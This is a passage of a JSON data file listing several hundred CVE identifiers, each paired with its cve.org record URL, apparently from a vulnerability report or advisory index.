"url": "https://www.cve.org/CVERecord?id=CVE-2022-30632"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2022-27774",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27774"
},
{
"name": "CVE-2025-21683",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21683"
},
{
"name": "CVE-2025-38332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38332"
},
{
"name": "CVE-2020-35492",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35492"
},
{
"name": "CVE-2025-21908",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21908"
},
{
"name": "CVE-2023-1289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1289"
},
{
"name": "CVE-2025-38386",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38386"
},
{
"name": "CVE-2023-6349",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6349"
},
{
"name": "CVE-2024-2004",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2004"
},
{
"name": "CVE-2017-3605",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3605"
},
{
"name": "CVE-2025-9232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9232"
},
{
"name": "CVE-2025-23165",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23165"
},
{
"name": "CVE-2022-40303",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40303"
},
{
"name": "CVE-2023-0801",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0801"
},
{
"name": "CVE-2025-9341",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9341"
},
{
"name": "CVE-2023-29406",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29406"
},
{
"name": "CVE-2017-7244",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7244"
},
{
"name": "CVE-2023-39319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39319"
},
{
"name": "CVE-2025-21895",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21895"
},
{
"name": "CVE-2025-61795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61795"
},
{
"name": "CVE-2025-1377",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1377"
},
{
"name": "CVE-2025-30705",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30705"
},
{
"name": "CVE-2018-16412",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-16412"
},
{
"name": "CVE-2025-22005",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22005"
},
{
"name": "CVE-2019-6462",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-6462"
},
{
"name": "CVE-2025-21935",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21935"
},
{
"name": "CVE-2022-4645",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4645"
},
{
"name": "CVE-2021-32493",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32493"
},
{
"name": "CVE-2023-24754",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24754"
},
{
"name": "CVE-2020-29509",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29509"
},
{
"name": "CVE-2023-5568",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5568"
},
{
"name": "CVE-2023-38470",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38470"
},
{
"name": "CVE-2025-21675",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21675"
},
{
"name": "CVE-2023-34967",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34967"
},
{
"name": "CVE-2025-38237",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38237"
},
{
"name": "CVE-2025-38174",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38174"
},
{
"name": "CVE-2025-8713",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8713"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2022-2869",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2869"
},
{
"name": "CVE-2021-4189",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4189"
},
{
"name": "CVE-2025-50088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50088"
},
{
"name": "CVE-2024-24785",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24785"
},
{
"name": "CVE-2023-35945",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-35945"
},
{
"name": "CVE-2024-45993",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45993"
},
{
"name": "CVE-2025-6170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6170"
},
{
"name": "CVE-2021-35937",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35937"
},
{
"name": "CVE-2024-58019",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58019"
},
{
"name": "CVE-2025-9900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9900"
},
{
"name": "CVE-2024-26146",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26146"
},
{
"name": "CVE-2025-21888",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21888"
},
{
"name": "CVE-2025-21866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21866"
},
{
"name": "CVE-2023-40745",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40745"
},
{
"name": "CVE-2022-1962",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1962"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2025-3730",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3730"
},
{
"name": "CVE-2025-22010",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22010"
},
{
"name": "CVE-2024-25260",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25260"
},
{
"name": "CVE-2024-21147",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21147"
},
{
"name": "CVE-2025-38037",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38037"
},
{
"name": "CVE-2017-3609",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3609"
},
{
"name": "CVE-2024-57990",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57990"
},
{
"name": "CVE-2021-29921",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-29921"
},
{
"name": "CVE-2022-41717",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41717"
},
{
"name": "CVE-2014-9636",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-9636"
},
{
"name": "CVE-2025-5351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5351"
},
{
"name": "CVE-2025-52520",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52520"
},
{
"name": "CVE-2022-1622",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1622"
},
{
"name": "CVE-2017-3611",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3611"
},
{
"name": "CVE-2024-53427",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53427"
},
{
"name": "CVE-2022-2521",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2521"
},
{
"name": "CVE-2023-49582",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-49582"
},
{
"name": "CVE-2025-43857",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43857"
},
{
"name": "CVE-2025-31344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31344"
},
{
"name": "CVE-2025-21976",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21976"
},
{
"name": "CVE-2023-28321",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28321"
},
{
"name": "CVE-2024-57975",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57975"
},
{
"name": "CVE-2020-14581",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14581"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2021-32491",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32491"
},
{
"name": "CVE-2025-50077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50077"
},
{
"name": "CVE-2022-2309",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2309"
},
{
"name": "CVE-2024-52533",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52533"
},
{
"name": "CVE-2023-24536",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24536"
},
{
"name": "CVE-2023-22025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22025"
},
{
"name": "CVE-2021-43527",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43527"
},
{
"name": "CVE-2022-0924",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0924"
},
{
"name": "CVE-2025-24014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24014"
},
{
"name": "CVE-2022-33068",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-33068"
},
{
"name": "CVE-2025-38342",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38342"
},
{
"name": "CVE-2025-54988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54988"
},
{
"name": "CVE-2024-58068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58068"
},
{
"name": "CVE-2025-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23083"
},
{
"name": "CVE-2015-4777",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4777"
},
{
"name": "CVE-2025-7039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7039"
},
{
"name": "CVE-2025-38167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38167"
},
{
"name": "CVE-2022-42915",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42915"
},
{
"name": "CVE-2023-0687",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0687"
},
{
"name": "CVE-2024-57998",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57998"
},
{
"name": "CVE-2021-3426",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3426"
},
{
"name": "CVE-2022-32221",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32221"
},
{
"name": "CVE-2022-1304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1304"
},
{
"name": "CVE-2021-2388",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2388"
},
{
"name": "CVE-2022-37434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37434"
},
{
"name": "CVE-2025-38257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38257"
},
{
"name": "CVE-2022-29458",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29458"
},
{
"name": "CVE-2025-38206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38206"
},
{
"name": "CVE-2019-12900",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12900"
},
{
"name": "CVE-2023-5156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5156"
},
{
"name": "CVE-2024-39908",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39908"
},
{
"name": "CVE-2025-27220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27220"
},
{
"name": "CVE-2021-32256",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32256"
},
{
"name": "CVE-2022-22942",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22942"
},
{
"name": "CVE-2024-38950",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38950"
},
{
"name": "CVE-2025-55163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55163"
},
{
"name": "CVE-2025-21862",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21862"
},
{
"name": "CVE-2023-47282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47282"
},
{
"name": "CVE-2016-20012",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-20012"
},
{
"name": "CVE-2025-38111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38111"
},
{
"name": "CVE-2024-0553",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0553"
},
{
"name": "CVE-2022-44638",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-44638"
},
{
"name": "CVE-2019-8325",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8325"
},
{
"name": "CVE-2025-21950",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21950"
},
{
"name": "CVE-2025-5918",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5918"
},
{
"name": "CVE-2019-3792",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-3792"
},
{
"name": "CVE-2022-43235",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43235"
},
{
"name": "CVE-2025-50092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50092"
},
{
"name": "CVE-2025-50099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50099"
},
{
"name": "CVE-2017-3614",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3614"
},
{
"name": "CVE-2022-0562",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0562"
},
{
"name": "CVE-2022-28131",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28131"
},
{
"name": "CVE-2025-22001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22001"
},
{
"name": "CVE-2024-10524",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10524"
},
{
"name": "CVE-2025-40017",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40017"
},
{
"name": "CVE-2023-45919",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45919"
},
{
"name": "CVE-2025-38326",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38326"
},
{
"name": "CVE-2025-3263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3263"
},
{
"name": "CVE-2025-4878",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4878"
},
{
"name": "CVE-2018-15607",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-15607"
},
{
"name": "CVE-2025-21899",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21899"
},
{
"name": "CVE-2025-32990",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32990"
},
{
"name": "CVE-2025-38384",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38384"
},
{
"name": "CVE-2025-40778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40778"
},
{
"name": "CVE-2025-21719",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21719"
},
{
"name": "CVE-2025-38424",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38424"
},
{
"name": "CVE-2025-38430",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38430"
},
{
"name": "CVE-2025-21718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21718"
},
{
"name": "CVE-2025-3001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3001"
},
{
"name": "CVE-2025-9288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
},
{
"name": "CVE-2021-35588",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35588"
},
{
"name": "CVE-2022-32545",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32545"
},
{
"name": "CVE-2025-21694",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21694"
},
{
"name": "CVE-2025-41244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41244"
},
{
"name": "CVE-2022-24675",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24675"
},
{
"name": "CVE-2023-2603",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2603"
},
{
"name": "CVE-2025-21820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21820"
},
{
"name": "CVE-2017-6838",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6838"
},
{
"name": "CVE-2024-41946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41946"
},
{
"name": "CVE-2025-4802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4802"
},
{
"name": "CVE-2024-21140",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21140"
},
{
"name": "CVE-2024-41817",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41817"
},
{
"name": "CVE-2024-57979",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57979"
},
{
"name": "CVE-2024-58071",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58071"
},
{
"name": "CVE-2025-21994",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21994"
},
{
"name": "CVE-2025-30684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30684"
},
{
"name": "CVE-2017-6835",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6835"
},
{
"name": "CVE-2024-21094",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21094"
},
{
"name": "CVE-2025-48989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48989"
},
{
"name": "CVE-2024-9143",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9143"
},
{
"name": "CVE-2023-0799",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0799"
},
{
"name": "CVE-2024-12087",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12087"
},
{
"name": "CVE-2025-38420",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38420"
},
{
"name": "CVE-2021-3521",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3521"
},
{
"name": "CVE-2022-23806",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23806"
},
{
"name": "CVE-2022-21365",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21365"
},
{
"name": "CVE-2025-21943",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21943"
},
{
"name": "CVE-2019-16775",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16775"
},
{
"name": "CVE-2024-57997",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57997"
},
{
"name": "CVE-2025-38160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38160"
},
{
"name": "CVE-2024-33601",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33601"
},
{
"name": "CVE-2025-32989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32989"
},
{
"name": "CVE-2025-6051",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6051"
},
{
"name": "CVE-2022-21283",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21283"
},
{
"name": "CVE-2022-31782",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-31782"
},
{
"name": "CVE-2025-50093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50093"
},
{
"name": "CVE-2025-38107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38107"
},
{
"name": "CVE-2025-32434",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32434"
},
{
"name": "CVE-2025-22874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
},
{
"name": "CVE-2025-53069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53069"
},
{
"name": "CVE-2025-38085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38085"
},
{
"name": "CVE-2025-21806",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21806"
},
{
"name": "CVE-2025-38222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38222"
},
{
"name": "CVE-2025-38197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38197"
},
{
"name": "CVE-2022-1271",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1271"
},
{
"name": "CVE-2024-28085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28085"
},
{
"name": "CVE-2022-43253",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43253"
},
{
"name": "CVE-2021-36221",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36221"
},
{
"name": "CVE-2024-57977",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57977"
},
{
"name": "CVE-2018-1000075",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000075"
},
{
"name": "CVE-2025-53019",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53019"
},
{
"name": "CVE-2020-14782",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14782"
},
{
"name": "CVE-2025-50059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50059"
},
{
"name": "CVE-2024-5569",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5569"
},
{
"name": "CVE-2024-57952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57952"
},
{
"name": "CVE-2025-53367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53367"
},
{
"name": "CVE-2025-21579",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21579"
},
{
"name": "CVE-2021-45942",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45942"
},
{
"name": "CVE-2022-1615",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1615"
},
{
"name": "CVE-2025-21928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21928"
},
{
"name": "CVE-2021-20246",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20246"
},
{
"name": "CVE-2025-21707",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21707"
},
{
"name": "CVE-2023-24755",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24755"
},
{
"name": "CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"name": "CVE-2022-2880",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2880"
},
{
"name": "CVE-2025-5025",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5025"
},
{
"name": "CVE-2023-21937",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21937"
},
{
"name": "CVE-2022-23773",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23773"
},
{
"name": "CVE-2025-22007",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22007"
},
{
"name": "CVE-2023-24539",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24539"
},
{
"name": "CVE-2024-27281",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27281"
},
{
"name": "CVE-2025-38467",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38467"
},
{
"name": "CVE-2024-34459",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34459"
},
{
"name": "CVE-2025-21804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21804"
},
{
"name": "CVE-2021-34558",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-34558"
},
{
"name": "CVE-2021-3737",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3737"
},
{
"name": "CVE-2025-49795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49795"
},
{
"name": "CVE-2017-6837",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6837"
},
{
"name": "CVE-2014-9913",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-9913"
},
{
"name": "CVE-2025-21934",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21934"
},
{
"name": "CVE-2025-38072",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38072"
},
{
"name": "CVE-2025-53044",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53044"
},
{
"name": "CVE-2023-6237",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6237"
},
{
"name": "CVE-2024-37407",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37407"
},
{
"name": "CVE-2015-4775",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4775"
},
{
"name": "CVE-2025-22011",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22011"
},
{
"name": "CVE-2022-1725",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1725"
},
{
"name": "CVE-2022-43252",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43252"
},
{
"name": "CVE-2023-0614",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0614"
},
{
"name": "CVE-2016-0694",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0694"
},
{
"name": "CVE-2023-6228",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6228"
},
{
"name": "CVE-2021-46848",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46848"
},
{
"name": "CVE-2024-5197",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5197"
},
{
"name": "CVE-2020-21606",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-21606"
},
{
"name": "CVE-2025-38075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38075"
},
{
"name": "CVE-2025-38000",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38000"
},
{
"name": "CVE-2022-40674",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40674"
},
{
"name": "CVE-2025-1376",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1376"
},
{
"name": "CVE-2025-30761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30761"
},
{
"name": "CVE-2001-1269",
"url": "https://www.cve.org/CVERecord?id=CVE-2001-1269"
},
{
"name": "CVE-2025-50087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50087"
},
{
"name": "CVE-2024-22365",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22365"
},
{
"name": "CVE-2025-38058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38058"
},
{
"name": "CVE-2023-20873",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-20873"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2022-4450",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4450"
},
{
"name": "CVE-2025-38617",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38617"
},
{
"name": "CVE-2025-21762",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21762"
},
{
"name": "CVE-2023-47169",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47169"
},
{
"name": "CVE-2025-38122",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38122"
},
{
"name": "CVE-2025-21801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21801"
},
{
"name": "CVE-2024-7592",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7592"
},
{
"name": "CVE-2025-48988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48988"
},
{
"name": "CVE-2025-38083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38083"
},
{
"name": "CVE-2023-2650",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2650"
},
{
"name": "CVE-2023-0795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0795"
},
{
"name": "CVE-2015-2583",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2583"
},
{
"name": "CVE-2025-21692",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21692"
},
{
"name": "CVE-2025-38173",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38173"
},
{
"name": "CVE-2022-21434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21434"
},
{
"name": "CVE-2025-2148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2148"
},
{
"name": "CVE-2024-2236",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2236"
},
{
"name": "CVE-2025-38143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38143"
},
{
"name": "CVE-2023-4039",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4039"
},
{
"name": "CVE-2025-45768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-45768"
},
{
"name": "CVE-2023-38469",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38469"
},
{
"name": "CVE-2024-38428",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38428"
},
{
"name": "CVE-2022-3821",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3821"
},
{
"name": "CVE-2014-3577",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-3577"
},
{
"name": "CVE-2025-21869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21869"
},
{
"name": "CVE-2025-1365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1365"
},
{
"name": "CVE-2023-32570",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32570"
},
{
"name": "CVE-2025-54410",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54410"
},
{
"name": "CVE-2023-52970",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52970"
},
{
"name": "CVE-2022-3996",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3996"
},
{
"name": "CVE-2024-25062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25062"
},
{
"name": "CVE-2016-5841",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-5841"
},
{
"name": "CVE-2022-2879",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2879"
},
{
"name": "CVE-2025-53101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53101"
},
{
"name": "CVE-2022-32205",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32205"
},
{
"name": "CVE-2023-27534",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27534"
},
{
"name": "CVE-2024-2398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2398"
},
{
"name": "CVE-2023-24532",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24532"
},
{
"name": "CVE-2023-27536",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27536"
},
{
"name": "CVE-2025-52434",
